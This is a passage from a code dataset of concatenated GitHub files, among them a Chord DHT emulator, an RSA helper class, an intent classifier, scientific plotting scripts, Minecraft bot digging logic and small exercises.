'number_of_reserved_sectors'\nk_number_of_FATs = 'number_of_FATs'\nk_media_descriptor = 'media_descriptor'\nk_sectors_per_track = 'sectors_per_track'\nk_number_of_heads = 'number_of_heads'\nk_number_of_hidden_sectors = 'number_of_hidden_sectors'\nk_sectors_per_FAT = 'sectors_per_FAT'\nk_drive_description = 'drive_description'\nk_version = 'version'\nk_cluster_number_of_root_directory_start =\\\n    'cluster_number_of_root_directory_start'\nk_sector_number_of_FS_info_sector = 'sector_number_of_FS_info_sector'\nk_sector_number_of_boot_sectors_backup = 'sector_number_of_boot_sectors_backup'\nk_drive_number = 'drive_number'\nk_extended_boot_signature = 'extended_boot_signature'\nk_volume_id = 'volume_id'\nk_volume_label = 'volume_label'\nk_filesystem_type = 'filesystem_type'\n\nk_FAT32FileAllocationTable = 'FAT32FileAllocationTable'\n\nk_Drive = 'Drive'\n\nk_FAT32 = 'FAT32'\nk_NTFS = 'NTFS'\nk_ExtendedPartition = 'ExtendedPartition'\n\nk_reserved = 
'reserved'\n\nk_FAT32DirectoryTableEntry = 'FAT32DirectoryTableEntry'\nk_short_file_name = 'short_file_name'\nk_short_extension = 'short_extension'\nk_attribute = 'attribute'\nk_create_time_10ms = 'create_time_10ms'\nk_create_time = 'create_time'\nk_create_date = 'create_date'\nk_access_date = 'access_date'\nk_higher_cluster = 'higher_cluster'\nk_modify_time = 'modify_time'\nk_modify_date = 'modify_date'\nk_lower_cluster = 'lower_cluster'\nk_file_length = 'file_length'\n\nk_FAT32LongFilenameEntry = 'FAT32LongFilenameEntry'\nk_sequence_number = 'sequence_number'\nk_name_1 = 'name_1'\nk_type = 'type'\nk_checksum = 'checksum'\nk_name_2 = 'name_2'\nk_first_cluster = 'first_cluster'\nk_name_3 = 'name_3'\n\nk_filename = 'filename'\nk_full_path = 'full_path'\nk_path = 'path'\nk_extension = 'k_extension'\nk_cluster_list = 'cluster_list'\n\nk_NTFSBootSector = 'NTFSBootSector'\nk_cluster_number_of_MFT_start = 'cluster_number_of_MFT_start'\nk_cluster_number_of_MFT_mirror_start = 'cluster_number_of_MFT_mirror_start'\nk_clusters_per_MFT_record = 'clusters_per_MFT_record'\nk_bytes_per_MFT_record = 'bytes_per_MFT_record'\nk_clusters_per_index_record = 'clusters_per_index_record'\nk_bytes_per_index_record = 'bytes_per_index_record'\nk_serial_number = 'serial_number'\n\nk_FileRecordHeader = 'FileRecordHeader'\nk_offset_to_update_sequence = 'offset_to_update_sequence'\nk_size_of_update_sequence = 'size_of_update_sequence'\nk_logfile_sequence_number = 'logfile_sequence_number'\nk_offset_to_first_attribute = 'offset_to_first_attribute'\nk_flags = 'flags'\nk_logical_size = 'logical_size'\nk_allocated_size = 'allocated_size'\nk_base_record_index = 'base_record_index'\nk_id_of_next_attribute = 'id_of_next_attribute'\nk_number_of_this_record = 'number_of_this_record'\nk_update_sequence_number = 'update_sequence_number'\n\nk_common_header = 'common_header'\nk_attribute_type = 'attribute_type'\nk_size_of_attribute = 'size_of_attribute'\nk_is_resident = 'is_resident'\nk_length_of_name = 'length_of_name'\nk_offset_to_name = 'offset_to_name'\nk_attribute_id = 'attribute_id'\nk_resident_header = 'resident_header'\nk_size_of_attribute_content = 'size_of_attribute_content'\nk_offset_to_attribute_content = 'offset_to_attribute_content'\nk_is_indexed = 'is_indexed'\nk_non_resident_header = 'non_resident_header'\nk_starting_vcn_of_data_runs = 'starting_vcn_of_data_runs'\nk_ending_vcn_of_data_runs = 'ending_vcn_of_data_runs'\nk_offset_to_data_runs = 'offset_to_data_runs'\nk_compression_unit = 'compression_unit'\nk_initial_size = 'initial_size'\n\nk_MFT_change_time = 'MFT_change_time'\nk_access_time = 'access_time'\nk_maximum_version_number = 'maximum_version_number'\nk_version_number = 'version_number'\nk_class_id = 'class_id'\n\nk_parent_reference = 'parent_reference'\nk_filename_namespace = 'filename_namespace'\n\nk_GUID_object_id = 'GUID_object_id'\nk_GUID_birth_volume_id = 'GUID_birth_volume_id'\nk_GUID_birth_object_id = 'GUID_birth_object_id'\nk_GUID_domain_id = 'GUID_domain_id'\n","repo_name":"fnmdx111/createfile","sub_path":"drive/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29114176041","text":"from dht import *\nfrom random import randint\nfrom hashlib import sha256\nimport csv\n\n# a ring with 4096 IDs\nd = DHT(12)\n# replication degree\ndegree = 4\n# get node and file's ID\n\n\ndef get_ID(input_name):\n hash_value = sha256(input_name.encode())\n hash_value = 
hash_value.hexdigest()\n    # print(hash_value)\n    # print(int(hash_value, 16))\n    return int(int(hash_value, 16) % 4096)\n\n\n# Add nodes\nIP_file = open(\"data/nodes.txt\")\nfor IP in IP_file:\n    # print(IP)\n    IP = IP.rstrip('\\n')\n    n = Node(get_ID(IP.rstrip('\\n')))\n    # print(n.ID)\n    d.join(n)\nIP_file.close()\n\n# print(\"\\nDHT has \" + str(d._numNodes) + \" nodes\")\n\n\nd.updateAllFingerTables()\n\n\n# Store Objects\nname_file = open(\"data/files.txt\")\nfor name in name_file:\n    # print(name.rstrip('\\n'))\n    name = name.rstrip('\\n')\n    name_ID = get_ID(name)\n    d.store(d._startNode, name_ID, name, degree)\n\n# Get all the stored items\nstored_item = []\nstart_node = d._startNode\ntemp0 = [str(start_node.ID)]\ntemp0 = temp0 + list(start_node.data.values())\nstored_item.append(temp0)\nnode = start_node.fingerTable[0]\nwhile node != start_node:\n    # print(node.ID)\n    temp = [str(node.ID)]\n    temp = temp + list((node.data.values()))\n    stored_item.append(temp)\n    node = node.fingerTable[0]\n    # print(node.data.values())\n    # node = node.fingerTable[0]\n\n# # print(stored_item)\n\n# Write all the stored items into a csv file\nwith open(\"ring_structure_with_rep.csv\", 'w') as file:\n    writer = csv.writer(file, delimiter='\\t')\n    for item in stored_item:\n        writer.writerow(item)\n\n# Do queries in the query file\nhops = []\nwith open(\"data/queries.txt\") as file:\n    for query in file:\n        query = query.rstrip(\"\\n\")\n        temp = query.split(\",\")\n        start_IP = temp[0]\n        key = temp[1]\n        # First find the start node\n        start_node = d.findNode(d._startNode, get_ID(start_IP))\n        # print(start_node.ID)\n        # Second get the hops\n        hop = d.lookup(start_node, get_ID(key), degree)\n        if hop[-1] is not None:\n            hop_new = [node.ID for node in hop]\n        else:\n            hop_new = [node.ID for node in hop[:-1]]\n            hop_new.append(\"None\")\n        hops.append(hop_new)\n\nwith open(\"routes_with_rep.csv\", 'w') as file:\n    writer = csv.writer(file, delimiter='\\t')\n    for item in hops:\n        writer.writerow(item)\n\n# print(\"malicious1\" + str(get_ID(\"24.121.88.210\")))\n# print(\"malicious2\" + str(get_ID(\"184.15.113.235\")))\n# print(\"start\")\n# d.lookup(d.findNode(d._startNode, 2858), get_ID(\"note30ef7dde.mp3\"), 4)\n","repo_name":"zhr1996/Emulating-Chord-Peer-to-Peer-Hash-Tables","sub_path":"part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"32132399242","text":"from CipherInterface import CipherInterface\nfrom Crypto.Cipher import PKCS1_OAEP\nimport Crypto.PublicKey.RSA\nfrom Crypto.Random import get_random_bytes\n\nclass RSA(CipherInterface):\n\tdef __init__(self):\n\t\tself.keystring = \"\"\n\n\tdef setKey(self, keyfilestring):\n\t\tf = open(keyfilestring, 'r')\n\t\tKey = f.read()\n\t\tif not Key:\n\t\t\treturn False\n\n\t\tprint(Key)\n\t\tself.keystring = Crypto.PublicKey.RSA.importKey(Key)\n\n\n\t\treturn True\n\n\tdef encrypt(self, plaintext):\n\t\tCHUNK_SIZE = 214 #amount to encrypt at a time\n\t\tciphertext= b\"\"\n\t\tcipher = PKCS1_OAEP.new(self.keystring)\n\t\tplaintext = bytes(plaintext, encoding=\"ascii\") #converts to byte string\n\t\tfor x in range(0, len(plaintext), CHUNK_SIZE):\n\t\t\tciphertext += cipher.encrypt(plaintext[x:x+CHUNK_SIZE])\n\n\t\treturn ciphertext\n\n\n\tdef decrypt(self, ciphertext):\n\t\tCHUNK_SIZE = 256 #amount to decrypt at a time\n\t\tplaintext= b\"\"\n\t\tcipher = PKCS1_OAEP.new(self.keystring)\n\t\t# plaintext += cipher.decrypt(ciphertext)\n\t\tfor x in range(0, len(ciphertext), 
CHUNK_SIZE):\n\t\t\tplaintext += cipher.decrypt(ciphertext[x:x+CHUNK_SIZE])\n\t\treturn plaintext","repo_name":"ImWayGooderest/Cryptography-Project-2-Python","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18022203228","text":"from utils import query, FINE_TUNED\nfrom data_classes.intents import INTENTS\n\nAPI_URL = \"https://api-inference.huggingface.co/models/facebook/bart-large-mnli\"\nif FINE_TUNED:\n from transformers import pipeline\n\nclass IntentClassifier:\n \"\"\"Classifies Intent\"\"\"\n\n def __init__(self):\n if FINE_TUNED:\n self.clf = pipeline(\n task='zero-shot-classification', \n model='facebook/bart-large-mnli',\n multi_label=True\n )\n\n def classify_intent(self, text):\n print(\"classifying intent\")\n if FINE_TUNED:\n return self.clf(text, INTENTS)\n\n payload = {\n \"inputs\": text,\n \"parameters\": {\"candidate_labels\": INTENTS},\n }\n\n return query(payload, API_URL)\n","repo_name":"alanb43/HearSay","sub_path":"intent_classifier.py","file_name":"intent_classifier.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"15321354459","text":"from morse_pf import *\nplt.style.use('paper')\n\n\ndef morse_potential(r, d_e, nu, r_e ):\n a = np.sqrt(m * (2.0 * np.pi * nu) ** 2 / (2.0 * d_e))\n return d_e * (1.0 - np.exp(-a * (r - r_e)))**2\n\n\ndef ho_potential(r, nu, r_e):\n return 0.5 * m * (2.0 * np.pi * nu)**2 * (r - r_e)**2\n\n\ndef qunatum(nus_hz):\n\n entropies = []\n\n for nu in nus_hz:\n h_nu_over_kb_t = (h * nu) / (kb * t)\n s = r * (h_nu_over_kb_t / (np.exp(h_nu_over_kb_t) - 1.0) - np.log(1.0 - np.exp(- h_nu_over_kb_t)))\n entropies.append(s)\n\n return plt.plot(nus, entropies, label='quantum', c='#1f77b4')\n\n\ndef classical(nus_hz):\n\n classical_entropies = []\n\n for nu in nus_hz:\n h_nu_over_kb_t = (h * nu) / (kb * t)\n s_clasical = r * (np.log(np.exp(1) / h_nu_over_kb_t))\n classical_entropies.append(s_clasical)\n\n return plt.plot(nus, classical_entropies, label='HO', c='#ff7f0e')\n\n\ndef truncated_classical(nus_hz):\n\n classical_entropies = []\n\n def z(nu):\n return ((np.pi * kb * t / (4.0 * h * nu)) * special.erfc(-r_e * np.sqrt(beta / (2.0 * m))) *\n special.erfc(-r_e * np.sqrt(beta * m * (2.0 * np.pi * nu)**2 / (2.0 * m)))) # nu = omega / 2 pi\n\n def dZ_dT(nu):\n a = r_e**2 / (2.0 * kb * m)\n b = r_e**2 * m * (2.0 * np.pi * nu)**2 / (2.0 * kb)\n term0 = special.erfc(-np.sqrt(a/t)) * special.erfc(-np.sqrt(b/t))\n term1 = (b * np.exp(-b / t) * special.erfc(-np.sqrt(a/t))) / (np.sqrt(b * np.pi * t))\n term2 = (a * np.exp(-a / t) * special.erfc(-np.sqrt(b/t))) / (np.sqrt(a * np.pi * t))\n\n return (kb / (4.0 * h * nu)) * (term0 + term1 + term2)\n\n for nu in nus_hz:\n pf = z(nu)\n s_clasical = r * (t * (1.0 / pf) * dZ_dT(nu) + np.log(pf))\n classical_entropies.append(s_clasical)\n\n return plt.plot(nus, classical_entropies, label='trunc. 
HO', c='#2ca02c')\n\n\ndef morse_classical(nus_hz):\n\n classical_entropies = []\n\n def dZ_dT(nu, temp):\n\n dt = 1E-8\n return (morse_pf(d_e, nu, kb, temp + dt, h, m) - morse_pf(d_e, nu, kb, temp, h, m)) / dt\n\n for nu in nus_hz:\n pf = morse_pf(d_e, nu, kb, t, h, m)\n s_clasical = r * (t * (1.0 / pf) * dZ_dT(nu, t) + np.log(pf))\n classical_entropies.append(s_clasical)\n\n return plt.plot(nus, classical_entropies, label='Morse', c='#d62728')\n\n\ndef plot(nus_hz):\n # qunatum(nus_hz)\n classical(nus_hz)\n truncated_classical(nus_hz)\n morse_classical(nus_hz)\n\n plt.plot(np.linspace(-200, 5000, 10), np.zeros(10), ls='--', c='k')\n plt.xlabel('$\\\\nu$ / cm$^{-1}$')\n plt.ylabel('$S$ / J K$^{-1}$ mol$^{-1}$')\n plt.ylim(-20)\n plt.xlim([-22, 3000])\n plt.legend()\n\n return plt.show()\n\n\nif __name__ == '__main__':\n\n nus = np.linspace(0.1, 3000, 100)\n c_cm = 2.998E10 # cm s-1\n m_to_ang = 1E10 # A m-1\n nus_hz = nus * c_cm\n\n kb = 1.38064852E-23 # J K-1\n na = 6.0221409E23 # mol-1\n r = 8.3144598 # J K-1 mol-1\n h = 6.62607004E-34 # J s\n t = 298.15 # K\n beta = 1.0 / (kb * t) # J-1\n\n r_e = 1E-10 # 1 Å\n m = 1.6605E-27 # kg\n\n d_e = 400 * 1000 / na # J\n\n # plot(nus_hz)\n\n nu = 2000 * c_cm\n xs = np.linspace(-1.5E-10, 4E-10, 500)\n ys_ho = np.array([ho_potential(x, nu, r_e=0.0) for x in xs])\n ys_ho_trunc = np.array([ho_potential(x, nu, r_e=0.0) if x > -r_e else 1E10 for x in xs])\n ys_morse = np.array([morse_potential(x, d_e, nu, r_e=0.0) for x in xs])\n\n plt.plot(xs * m_to_ang, 1E18 * ys_ho, c='#ff7f0e', ls='--')\n plt.plot(xs * m_to_ang, 1E18 * ys_ho_trunc, c='#2ca02c')\n plt.xlabel('x / Å')\n plt.ylabel('V(x) / $\\\\times 10^{-18}\\;$ J')\n plt.ylim([0.0, 2.0])\n plt.show()\n plt.plot(xs * m_to_ang, 1E18 * ys_ho, c='#ff7f0e', ls='--')\n plt.plot(xs * m_to_ang, 1E18 * ys_morse, c='#d62728')\n plt.xlabel('x / Å')\n plt.ylabel('V(x) / $\\\\times 10^{-18}\\;$ J')\n plt.ylim([0.0, 2.0])\n plt.show()\n","repo_name":"t-young31/thesis","sub_path":"4/figs/fig_s_vs_nu/old/s_vs_nu.py","file_name":"s_vs_nu.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70168941377","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 21 12:49:05 2015\nread 'onset' data ,and plot graph of time and temp\n@author: hxu\n\"\"\"\nfrom pandas import *\nimport xlrd #to read xlrd\nfrom dateutil.parser import parse\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\n\npath = \"SN 10708774 2015-04-21 12:27:55 -0400.xlsx\"\nbook = xlrd.open_workbook(path)\nlocation=book.sheet_by_index(2).row_slice(rowx=11,\n start_colx=3,\n end_colx=4)\nlocation=str(location[0])[5:]\nlat1=int(location[2:4]) #convert lat lon to XX.XXXX\nlat2=int(location[8:10])/60.0\nlat3=int(location[11:13])/3600.0\nlon1=-int(location[16:18])\nlon2=-int(location[22:24])/60.0\nlon3=-int(location[-5:-3])/3600.0\nlat=round(lat1+lat2+lat3,4)\nlon=round(lon1+lon2+lon3,4)\nf='SN 10708774 2015-04-21 12:27:55 -0400.csv'\nvariables=['datetime','temp','1','2','3','4','5']\nskipr=3 #get rid of first 8 rows\ndt=read_csv(f,sep=',',date_parser=parse,skiprows=skipr,names=variables) #read minilog data\ndt=dt.drop(dt.index[[-1]])\ntime_ori=dt['datetime'].tolist()\n\nimport datetime\ntime_ori=[(datetime.datetime.strptime(str(q),'%Y-%m-%d %H:%M:%S')) for q in time_ori] #time transition\n#datetime.datetime.fromtimestamp(). 
strptime('%Y-%m-%d %H:%M:%S')\ntemp_ori=dt['temp'].tolist()\n\nfig=plt.figure() #set figure\nax=fig.add_subplot(111)\nax.plot(time_ori,temp_ori,label='HOBE',linewidth=3, color='r')\n\nax.set_ylabel('Temperature(F)',fontsize=18) #plot\nxfmt = md.DateFormatter('%Y-%m-%d %H:%M') #set plot time axis format\nax.xaxis.set_major_formatter(xfmt)\nax.legend()\nplt.gcf().autofmt_xdate() #beautify time axis\nplt.title('On coordinate: '+str(lat)+' '+str(lon),fontsize=25)\n#df1.plot(x='time',y='temp_cur')\nplt.savefig('test'+'.png') #save file before show() so the figure is not blank\nplt.show()","repo_name":"xhx509/telemetered_temperature","sub_path":"hobe.py","file_name":"hobe.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6386091820","text":"from datetime import datetime\nimport pytz\nclass Account:\n\tdef __init__(self, name, balance):\n\t\tself.name = name\n\t\tself.balance = balance\n\t\tself.history = []\n\n\n\t@staticmethod\n\tdef _get_time():\n\t\treturn pytz.utc.localize(datetime.utcnow()).astimezone().isoformat()\n\t\t\n\n\tdef deposit(self, amount):\n\t\tself.balance += amount\n\t\tself.show_balance()\n\t\tself.history.append([amount,self._get_time()])\n\n\tdef withdraw(self, amount):\n\t\tif self.balance > amount:\n\t\t\tself.balance -= amount\n\t\t\tprint(f'You spent {amount} units')\n\t\t\tself.history.append([-amount,self._get_time()])\n\n\t\t\tself.show_balance()\n\t\telse:\n\t\t\tprint('Not enough money')\n\t\t\tself.show_balance()\n\n\tdef show_balance(self):\n\t\tprint(f'Your balance: {self.balance}')\n\n\tdef show_history(self):\n\t\tfor amount, date in self.history:\n\t\t\tif amount >0:\n\t\t\t\ttransaction = 'deposit'\n\t\t\telse:\n\t\t\t\ttransaction = 'withdraw'\n\t\t\tprint(f'{amount} {transaction} {date}\\t')\n\n\n\na = Account('Nikolay',0)\nb = Account('Vita',0)\n\n","repo_name":"minc84/learn","sub_path":"trenning.py","file_name":"trenning.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31343860544","text":"# _*_ coding: utf-8 _*_\n\nBATCH_SIZE = 64\nEMB_SIZE = 50\nMAX_CHAR_LEN = 100\nMAX_LEXICON_WORDS_NUM = 5\nNUM_UNITS = 128\nNUM_TAGS = 18\nLEARNING_RATE = 0.005\nCLIP = 5\nOPTIMIZER = 'adam'\nGAZ_FILE = 'data/ctb.50d.vec'\nCHAR_EMB = 'data/gigaword_chn.all.a2b.uni.ite50.vec'\nTRAIN_FILE = 'data/demo.train.char'\nDEV_FILE = 'data/demo.dev.char'\nTEST_FILE = 'data/demo.test.char'\nMODEL_SAVE_PATH = 'model/ckpt'\n","repo_name":"lyssym/NER-toolkits","sub_path":"tf_kit/lattice/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"38927780326","text":"import sys\nfrom sys import version_info\n\nimport numpy as np\nfrom os.path import dirname, abspath\n\nsys.dont_write_bytecode = True\n\nif __name__ == '__main__' and __package__ is None:\n    parent_dir = dirname(dirname(abspath(__file__)))\n    sys.path.append(parent_dir)\n\nif version_info.major > 2:\n    from neuropredict.utils import balanced_accuracy\nelse:\n    raise NotImplementedError('neuropredict supports only Python 3+.')\n\n\ndef test_balanced_accuracy():\n    \"\"\"Tests ensure the accuracy of accuracy calculations!\"\"\"\n\n    num_trials = 10\n\n    for num_classes in np.random.randint(2, 100, num_trials):\n        cm_100 = np.zeros((num_classes, num_classes), int)\n        # no errors! 
sizes are imbalanced\n        np.fill_diagonal(cm_100, np.random.randint(10, 100, num_classes))\n        if not np.isclose(balanced_accuracy(cm_100), 1.0):\n            raise ArithmeticError('accuracy calculations on perfect classifier '\n                                  'does not return 100% accuracy!!')\n\n        cm_100perc_wrong = np.random.randint(10, 100, (num_classes, num_classes))\n        # ALL errors! sizes are imbalanced\n        np.fill_diagonal(cm_100perc_wrong, 0.0)\n        if not np.isclose(balanced_accuracy(cm_100perc_wrong), 0.0):\n            raise ArithmeticError('accuracy calculations on 100% wrong classifier '\n                                  'does not return 0% accuracy!!')\n\n        cm = np.random.randint(10, 100, (num_classes, num_classes)).astype('float64')\n        np.fill_diagonal(cm, 0)\n        class_sizes_without_diag_element = cm.sum(axis=1)\n        chosen_accuracy = np.round(np.random.rand(num_classes), decimals=3)\n        factor = chosen_accuracy / (1.0 - chosen_accuracy)\n        # filling the diag in order to reach certain level of chosen accuracy\n        diag_values = np.around(class_sizes_without_diag_element * factor).astype('float64')\n        np.fill_diagonal(cm, diag_values)\n        computed_acc = balanced_accuracy(cm)\n        expected_acc = np.mean(chosen_accuracy)\n        if not np.isclose(computed_acc, expected_acc, atol=1e-4):\n            raise ArithmeticError('accuracy calculations do not match the expected!!\\n'\n                                  ' Expected : {:.8f}\\n'\n                                  ' Estimated: {:.8f}\\n'\n                                  ' Differ by: {:.8f}\\n'.format(expected_acc, computed_acc,\n                                                                expected_acc - computed_acc))\n\n\ntest_balanced_accuracy()\n","repo_name":"smlacava/neuropredict","sub_path":"neuropredict/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"}
+{"seq_id":"3540077199","text":"# coding=utf-8\nimport dropbox #work with files on Dropbox\nfrom PIL import Image #edit image data\nimport tempfile\n\n#connect to my own Dropbox account\naccesskey=''\ndbx = dropbox.Dropbox(accesskey)\ndbx.users_get_current_account()\nimagepath='/カメラアップロード'\n#print the list of files\nfor entry in dbx.files_list_folder(imagepath).entries:\n    print(entry.name)\n    if entry.name[-4:] == '.png':\n        with tempfile.TemporaryDirectory() as dname:\n            print(dname)\n            dbx.files_download_to_file(dname,imagepath+'/'+entry.name)\n","repo_name":"gurencrize/crizeimagechanger","sub_path":"crizeimagechanger.py","file_name":"crizeimagechanger.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"74240542335","text":"import asyncio\nimport time\nfrom typing import Union\n\nclass Vec3:\n    def __init__(self, x: float, y: float, z: float):\n        self.x = x\n        self.y = y\n        self.z = z\n\n    def offset(self, x: float, y: float, z: float):\n        return Vec3(self.x + x, self.y + y, self.z + z)\n\n    def distance_to(self, other):\n        dx = self.x - other.x\n        dy = self.y - other.y\n        dz = self.z - other.z\n        return (dx * dx + dy * dy + dz * dz) ** 0.5\n\nclass Block:\n    def __init__(self, position: Vec3, diggable: bool):\n        self.position = position\n        self.diggable = diggable\n\ndef inject(bot):\n\n    swing_interval = None\n    wait_timeout = None\n\n    digging_task = None\n    bot.target_dig_block = None\n    bot.last_dig_time = None\n\n    async def dig(block: Block, force_look=False, dig_face: Union[str, Vec3] = 'auto'):\n        nonlocal digging_task\n\n        if block is None:\n            raise ValueError('dig was called with an undefined or null block')\n\n        if dig_face is None or isinstance(dig_face, Vec3):\n            dig_face = 'auto'\n\n        if bot.target_dig_block:\n            bot.stop_digging()\n\n        digging_face = 1 # Default (top)\n\n        if 
force_look != 'ignore':\n if isinstance(dig_face, Vec3):\n if dig_face.x:\n digging_face = BlockFaces.EAST if dig_face.x > 0 else BlockFaces.WEST\n elif dig_face.y:\n digging_face = BlockFaces.TOP if dig_face.y > 0 else BlockFaces.BOTTOM\n elif dig_face.z:\n digging_face = BlockFaces.SOUTH if dig_face.z > 0 else BlockFaces.NORTH\n await bot.look_at(\n block.position.offset(0.5, 0.5, 0.5).offset(dig_face.x * 0.5, dig_face.y * 0.5, dig_face.z * 0.5),\n force_look\n )\n elif dig_face == 'raycast':\n dx = bot.entity.position.x - (block.position.x + 0.5)\n dy = bot.entity.position.y + bot.entity.height - (block.position.y + 0.5)\n dz = bot.entity.position.z - (block.position.z + 0.5)\n\n visible_faces = {\n 'y': int(abs(dy) > 0.5),\n 'x': int(abs(dx) > 0.5),\n 'z': int(abs(dz) > 0.5)\n }\n\n valid_faces = []\n for face, visible in visible_faces.items():\n if not visible:\n continue\n\n target_pos = block.position.offset(\n 0.5 + (visible_faces['x'] * 0.5 if face == 'x' else 0),\n 0.5 + (visible_faces['y'] * 0.5 if face == 'y' else 0),\n 0.5 + (visible_faces['z'] * 0.5 if face == 'z' else 0)\n )\n\n start_pos = bot.entity.position.offset(0, bot.entity.height, 0)\n ray_block = bot.world.raycast(start_pos, target_pos.minus(start_pos).normalize(), 5)\n if ray_block:\n ray_pos = ray_block.position\n if ray_pos.x == block.position.x and ray_pos.y == block.position.y and ray_pos.z == block.position.z:\n valid_faces.append({\n 'face': ray_block.face,\n 'target_pos': ray_block.intersect\n })\n\n if valid_faces:\n closest = None\n dist_sqrt = 999\n for valid_face in valid_faces:\n t_pos = valid_face['target_pos']\n c_dist = Vec3(t_pos.x, t_pos.y, t_pos.z).distance_to(\n bot.entity.position.offset(0, bot.entity.height, 0)\n )\n if dist_sqrt > c_dist:\n closest = valid_face\n dist_sqrt = c_dist\n\n await bot.look_at(closest['target_pos'], force_look)\n digging_face = closest['face']\n else:\n raise ValueError('Block not in view')\n else:\n await bot.look_at(block.position.offset(0.5, 0.5, 0.5), force_look)\n\n digging_task = asyncio.create_task(do_digging(block, digging_face))\n await digging_task\n\n async def do_digging(block: Block, digging_face: int):\n nonlocal swing_interval, wait_timeout, digging_task\n\n if swing_interval or wait_timeout:\n raise RuntimeError('Digging is already in progress')\n\n def finish_digging():\n nonlocal swing_interval, wait_timeout\n swing_interval = None\n wait_timeout = None\n\n if bot.target_dig_block:\n bot._client.write('block_dig', {\n 'status': 2, # finish digging\n 'location': bot.target_dig_block.position,\n 'face': digging_face # hard coded to always dig from the top\n })\n\n bot.target_dig_block = None\n bot.last_dig_time = time.perf_counter()\n\n def on_block_update(old_block, new_block):\n nonlocal swing_interval, wait_timeout, digging_task\n if new_block is None or new_block.type != 0:\n return\n\n bot.remove_listener('blockUpdate', on_block_update)\n if swing_interval:\n swing_interval.cancel()\n swing_interval = None\n\n if wait_timeout:\n wait_timeout.cancel()\n wait_timeout = None\n\n bot.target_dig_block = None\n bot.last_dig_time = time.perf_counter()\n\n digging_task.set_result(None)\n\n bot.target_dig_block = block\n bot._client.write('block_dig', {\n 'status': 0, # start digging\n 'location': block.position,\n 'face': digging_face # default face is 1 (top)\n })\n\n wait_time = dig_time(block)\n wait_timeout = asyncio.create_task(asyncio.sleep(wait_time))\n swing_interval = asyncio.create_task(do_swing_interval())\n\n bot.swing_arm()\n\n def 
do_swing_arm():\n bot.swing_arm()\n\n async def do_swing_interval():\n while True:\n do_swing_arm()\n await asyncio.sleep(0.35)\n\n bot.add_listener('blockUpdate', on_block_update)\n\n def stop_digging():\n nonlocal swing_interval, wait_timeout, digging_task\n\n if swing_interval:\n swing_interval.cancel()\n swing_interval = None\n\n if wait_timeout:\n wait_timeout.cancel()\n wait_timeout = None\n\n if bot.target_dig_block:\n bot._client.write('block_dig', {\n 'status': 1, # cancel digging\n 'location': bot.target_dig_block.position,\n 'face': 1 # hard coded to always dig from the top\n })\n\n block = bot.target_dig_block\n bot.target_dig_block = None\n bot.last_dig_time = time.perf_counter()\n\n bot.remove_listener('blockUpdate', on_block_update)\n bot.emit('diggingAborted', block)\n\n digging_task.cancel()\n\n def can_dig_block(block: Block):\n if not block or not block.diggable:\n return False\n\n return block.position.offset(0.5, 0.5, 0.5).distance_to(\n bot.entity.position.offset(0, 1.65, 0)\n ) <= 5.1\n\n def dig_time(block: Block):\n type_id = None\n enchantments = []\n\n currently_held_item = bot.held_item\n if currently_held_item:\n type_id = currently_held_item.type\n enchantments = currently_held_item.enchants\n\n head_equipment_slot = bot.get_equipment_dest_slot('head')\n head_equipped_item = bot.inventory.slots[head_equipment_slot]\n if head_equipped_item:\n helmet_enchantments = head_equipped_item.enchants\n enchantments.extend(helmet_enchantments)\n\n creative = bot.game.game_mode == 'creative'\n return block.dig_time(\n type_id,\n creative,\n bot.entity.is_in_water,\n not bot.entity.on_ground,\n enchantments,\n bot.entity.effects\n )\n\n async def look_at(position: Vec3, force_look):\n # Implement look_at logic\n pass\n\n # Constants from BlockFaces class\n class BlockFaces:\n EAST = 5\n WEST = 4\n TOP = 1\n BOTTOM = 0\n SOUTH = 3\n NORTH = 2\n\n bot.dig = dig\n bot.stop_digging = stop_digging\n bot.can_dig_block = can_dig_block\n bot.dig_time = dig_time\n\n bot.target_dig_block = None\n bot.last_dig_time = None\n bot.add_listener('death', lambda: stop_digging())\n","repo_name":"CoC-Fire/python-mineflayer","sub_path":"plugins/digging.py","file_name":"digging.py","file_ext":"py","file_size_in_byte":8761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43324894679","text":"import sys\nfrom collections import deque\nn = int(sys.stdin.readline())\nqueue = []\nnumber = deque(range(1,n+1))\nwhile n > 1 :\n queue.append(number.popleft())\n number.append(number.popleft())\n n -= 1\nqueue.append(number.pop())\n\nfor i in range(len(queue)):\n print(queue[i], end=' ')","repo_name":"nuyggnoes/PythonNewbie","sub_path":"BaekJoon/BAEK_큐/2161.py","file_name":"2161.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9990960657","text":"import requests\r\n# Vervang de met uw identificatie code.\r\nurl = \"https://api.telegram.org/bot/\"\r\n\r\n\r\n# haalt chat id op\r\ndef get_chat_id(update):\r\n chat_id = 